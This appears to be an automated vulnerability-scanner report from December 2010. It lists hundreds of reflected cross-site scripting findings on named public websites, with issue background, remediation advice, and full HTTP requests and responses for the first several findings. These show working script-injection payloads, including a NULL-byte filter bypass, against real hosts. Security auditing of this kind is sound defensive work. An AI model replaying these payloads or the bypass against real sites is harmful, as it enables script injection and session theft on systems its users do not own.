1.336. http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm [name of an arbitrarily supplied request parameter]

1.337. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]

1.338. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]

1.339. http://www.swarmjam.com/waf.srv/sj/sj/cn [REST URL parameter 2]

1.340. http://www.swarmjam.com/waf.srv/sj/sj/cn [REST URL parameter 3]

1.341. http://www.swarmjam.com/waf.srv/sj/sj/cn [REST URL parameter 4]

1.342. http://www.thestar.com/Business/article/572653 [REST URL parameter 1]

1.343. http://www.thestar.com/Business/article/572653 [REST URL parameter 2]

1.344. http://www.ticketstonight.ca/ticketstonight/event.details.php [REST URL parameter 1]

1.345. http://www.vancouversun.com/business/ [REST URL parameter 1]

1.346. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/ [REST URL parameter 1]

1.347. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/ [REST URL parameter 2]

1.348. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/3448945/ [REST URL parameter 1]

1.349. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/3448945/ [REST URL parameter 2]

1.350. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/3448945/ [REST URL parameter 3]

1.351. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/3448945/story.html [REST URL parameter 3]

1.352. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/3448945/story.html [REST URL parameter 4]

1.353. http://www.vancouversun.com/robots.txt [REST URL parameter 1]

1.354. http://www.viglink.com/account [name of an arbitrarily supplied request parameter]

1.355. http://www.viglink.com/dashboard [name of an arbitrarily supplied request parameter]

1.356. http://www.viglink.com/dashboard/weekly [name of an arbitrarily supplied request parameter]

1.357. http://www.viglink.com/tools/coverage [name of an arbitrarily supplied request parameter]

1.358. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 1]

1.359. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 2]

1.360. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 3]

1.361. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 1]

1.362. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 2]

1.363. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 3]

1.364. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 1]

1.365. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 2]

1.366. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 3]

1.367. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 1]

1.368. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 2]

1.369. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 3]

1.370. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 1]

1.371. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 2]

1.372. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 3]

1.373. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 1]

1.374. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 2]

1.375. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 3]

1.376. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 1]

1.377. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 2]

1.378. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 1]

1.379. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 2]

1.380. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 3]

1.381. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 1]

1.382. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 2]

1.383. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 3]

1.384. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 1]

1.385. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 2]

1.386. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 3]

1.387. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 1]

1.388. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 2]

1.389. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 3]

1.390. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 1]

1.391. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 2]

1.392. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 3]

1.393. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 1]

1.394. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 2]

1.395. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 3]

1.396. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 1]

1.397. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 2]

1.398. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 3]

1.399. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 1]

1.400. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 2]

1.401. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 3]

1.402. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 1]

1.403. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 2]

1.404. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 3]

1.405. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 1]

1.406. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 2]

1.407. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 3]

1.408. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 1]

1.409. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 2]

1.410. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 3]

1.411. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 1]

1.412. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 2]

1.413. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 3]

1.414. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 1]

1.415. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 2]

1.416. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 3]

1.417. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 1]

1.418. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 2]

1.419. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 3]

1.420. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 1]

1.421. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 2]

1.422. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 3]

1.423. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 1]

1.424. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 2]

1.425. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 3]

1.426. http://yellowpages.superpages.com/common/js/jquery.spac.js [REST URL parameter 1]

1.427. http://yellowpages.superpages.com/common/js/jquery.spac.js [REST URL parameter 2]

1.428. http://yellowpages.superpages.com/common/js/jquery.spac.js [REST URL parameter 3]

1.429. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 1]

1.430. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 2]

1.431. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 3]

1.432. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 1]

1.433. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 2]

1.434. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 3]

1.435. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 1]

1.436. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 2]

1.437. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 3]

1.438. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 1]

1.439. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 2]

1.440. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 3]

1.441. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 1]

1.442. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 2]

1.443. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 3]

1.444. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 1]

1.445. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 2]

1.446. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 3]

1.447. http://yellowpages.superpages.com/common/js/stPtsDropDown.js [REST URL parameter 1]

1.448. http://yellowpages.superpages.com/common/js/stPtsDropDown.js [REST URL parameter 2]

1.449. http://yellowpages.superpages.com/common/js/stPtsDropDown.js [REST URL parameter 3]

1.450. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 1]

1.451. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 2]

1.452. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 3]

1.453. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 1]

1.454. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 2]

1.455. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 3]

1.456. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 1]

1.457. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 2]

1.458. http://yellowpages.superpages.com/forms/js/verifyShopping.js [REST URL parameter 1]

1.459. http://yellowpages.superpages.com/forms/js/verifyShopping.js [REST URL parameter 2]

1.460. http://yellowpages.superpages.com/forms/js/verifyShopping.js [REST URL parameter 3]

1.461. http://yellowpages.superpages.com/profile.jsp [REST URL parameter 1]

1.462. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]

1.463. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 1]

1.464. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 2]

1.465. http://yellowpages.superpages.com/profiler/abook.jsp [couponsLoc parameter]

1.466. http://yellowpages.superpages.com/profiler/abook.jsp [requestAction parameter]

1.467. http://yellowpages.superpages.com/profiler/css/alert.css [REST URL parameter 1]

1.468. http://yellowpages.superpages.com/profiler/css/alert.css [REST URL parameter 2]

1.469. http://yellowpages.superpages.com/profiler/css/alert.css [REST URL parameter 3]

1.470. http://yellowpages.superpages.com/profiler/js/mydir.js [REST URL parameter 1]

1.471. http://yellowpages.superpages.com/profiler/js/mydir.js [REST URL parameter 2]

1.472. http://yellowpages.superpages.com/profiler/js/mydir.js [REST URL parameter 3]

1.473. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 1]

1.474. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 2]

1.475. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 3]

1.476. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 1]

1.477. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 2]

1.478. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 3]

1.479. http://yellowpages.superpages.com/reviews/js/toggle.js [REST URL parameter 1]

1.480. http://yellowpages.superpages.com/reviews/js/toggle.js [REST URL parameter 2]

1.481. http://yellowpages.superpages.com/reviews/js/toggle.js [REST URL parameter 3]

1.482. http://yellowpages.superpages.com/reviews/js/toggleVote.js [REST URL parameter 1]

1.483. http://yellowpages.superpages.com/reviews/js/toggleVote.js [REST URL parameter 2]

1.484. http://yellowpages.superpages.com/reviews/js/toggleVote.js [REST URL parameter 3]

1.485. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 1]

1.486. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 2]

1.487. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 1]

1.488. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 2]

1.489. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 3]

1.490. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 1]

1.491. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 2]

1.492. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 3]

1.493. http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm [User-Agent HTTP header]

1.494. http://www.plan.ca/registration/index.cfm [action parameter]

1.495. http://www.plan.ca/registration/index.cfm [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 495 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003b3c6"><script>alert(1)</script>f91c047f372 was submitted in the REST URL parameter 1. This input was echoed as 3b3c6"><script>alert(1)</script>f91c047f372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%003b3c6"><script>alert(1)</script>f91c047f372 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 02:56:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2229000340571694017%3A141; expires=Tue, 18-Jan-2011 02:56:51 GMT; path=/; domain=digg.com
Set-Cookie: d=9d228c1b60508bfe9e16e518511a2d9023a3f67d9b8d81c49755c32e9cfd6664; expires=Fri, 18-Dec-2020 13:04:31 GMT; path=/; domain=.digg.com
X-Digg-Time: D=223201 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15306

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%003b3c6"><script>alert(1)</script>f91c047f372.rss">
...[SNIP]...

1.2. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4-YQ44GSY9bNGTqTq0kx1yD/view.html [[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4-YQ44GSY9bNGTqTq0kx1yD/view.html

Issue detail

The value of the [Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f2f1'-alert(1)-'c17a993ea7e was submitted in the [Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4-YQ44GSY9bNGTqTq0kx1yD/view.html?[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT=6f2f1'-alert(1)-'c17a993ea7e HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396861659244; ts=12/13/2010+9:01:05+PM; z=4; sid=b6ff4608-269f-4916-824f-4c4e6c59df4e; av1=c0596.61a68=1213101501:51f37.5cfcb=1214101419; vcs0=vC0596:61A68_0_0_0_1FB2C5_0_0|v51F37:5CFCB_0_0_0_1FB83B_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:02 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: av1=c0596.61a68=1213101501:51f37.5cfcb=1214101419:b8fb4.6339b=1218102102; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:61A68_0_0_0_1FB2C5_0_0|v51F37:5CFCB_0_0_0_1FB83B_0_0|vB8FB4:6339B_0_0_0_1FD04E_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 19 Dec 2010 03:03:01 GMT
Content-Length: 1128
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150d45525d5f4f58455e445a4a423660;expires=Sun, 19-Dec-2010 03:08:02 GMT;path=/

<html><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://media2.adshuffle.com/asrefinc11.js"></script><script type="text/javascript"
...[SNIP]...
<a target="_blank" href="6f2f1'-alert(1)-'c17a993ea7ehttp://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8'+window._asPURL+'/590824264/v/576462396861659244/ac/757684/b/266875/c/406428/click.html">
...[SNIP]...

1.3. http://vancouverdisabilitiesday.ca/%20target= [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vancouverdisabilitiesday.ca
Path:   /%20target=

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb8d8"><script>alert(1)</script>2c87a4594e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /%20target=?eb8d8"><script>alert(1)</script>2c87a4594e5=1 HTTP/1.1
Host: vancouverdisabilitiesday.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 03:05:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 727
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSAARTS=BHHGAGICMPCFNDPLDIPAAJMM; path=/
Cache-control: private


<html>
<head>
<title>International Day of Persons with Disabilities</title>
<meta name="description" content="Dec. 3, 2008 Roundhouse Community Centre">
<meta name="keywords" content="dis
...[SNIP]...
<frame src="http://members.shaw.ca/ckiyooka// target=?eb8d8"><script>alert(1)</script>2c87a4594e5=1" name="pageRedirect">
...[SNIP]...

1.4. http://ww3.nationalpost.com/services/email/share/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ww3.nationalpost.com
Path:   /services/email/share/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a9d18<script>alert(1)</script>98cf4f6e2eb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/email/share/?callback=?a9d18<script>alert(1)</script>98cf4f6e2eb HTTP/1.1
Host: ww3.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 62
Connection: close
Content-Type: application/json

?a9d18<script>alert(1)</script>98cf4f6e2eb({"success": false})

1.5. http://ww3.nationalpost.com/services/pluck/atc/ [returnurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ww3.nationalpost.com
Path:   /services/pluck/atc/

Issue detail

The value of the returnurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43f89'%3balert(1)//ba364a55228 was submitted in the returnurl parameter. This input was echoed as 43f89';alert(1)//ba364a55228 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/pluck/atc/?returnurl=43f89'%3balert(1)//ba364a55228 HTTP/1.1
Host: ww3.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:32 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 251
Connection: close
Content-Type: text/html; charset=UTF-8

<html><head>
<script type="text/javascript" src="http://members.canada.com/scripts/pluck.ashx"></script>
<script type="text/javascript">
document.location='43f89';alert(1)//ba364a55228';
</script>
...[SNIP]...

1.6. http://www.advisorworld.com/Compare-Annuity-Rates-2 [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorworld.com
Path:   /Compare-Annuity-Rates-2

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f878a"><script>alert(1)</script>30b222b59b0 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Compare-Annuity-Rates-2?utm_source=Googlef878a"><script>alert(1)</script>30b222b59b0&utm_campaign=annuity_placement_targeting HTTP/1.1
Host: www.advisorworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:12 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.14 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-Control: max-age=1209600
Expires: Sun, 02 Jan 2011 03:06:12 GMT
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 16857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" id="source" name="web_source" value="Googlef878a"><script>alert(1)</script>30b222b59b0" />
...[SNIP]...

1.7. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ashoka.org
Path:   /story/6495

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5291e"><script>alert(1)</script>8b1ed0d8a05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /story/6495?5291e"><script>alert(1)</script>8b1ed0d8a05=1 HTTP/1.1
Host: www.ashoka.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:17 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.2.8
Set-Cookie: SESS08b657267a8ac8cb7d48d3a9cb134ad3=3gddqs6ddqmdpo5f9i2v30mlb7; expires=Tue, 11 Jan 2011 06:39:37 GMT; path=/; domain=.ashoka.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 19 Dec 2010 03:06:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26921

<!-- This comment is intentional to keep the back compat in ie 7.0 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http:/
...[SNIP]...
<a name="fb_share" type="button_count" share_url="http://www.ashoka.org/story/6495?5291e"><script>alert(1)</script>8b1ed0d8a05=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.8. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ashoka.org
Path:   /story/6495

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 773df'-alert(1)-'5b4b835de75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/6495?773df'-alert(1)-'5b4b835de75=1 HTTP/1.1
Host: www.ashoka.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:18 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.2.8
Set-Cookie: SESS08b657267a8ac8cb7d48d3a9cb134ad3=dsp2ml8nb8mjok58innb7rlpl2; expires=Tue, 11 Jan 2011 06:39:38 GMT; path=/; domain=.ashoka.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 19 Dec 2010 03:06:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26876

<!-- This comment is intentional to keep the back compat in ie 7.0 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http:/
...[SNIP]...
<script>tweetmeme_style = 'compact'; tweetmeme_url = 'http://www.ashoka.org/story/6495?773df'-alert(1)-'5b4b835de75=1'; tweetmeme_source = '';</script>
...[SNIP]...

1.9. http://www.canada.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.canada.com
Path:   /

Issue detail

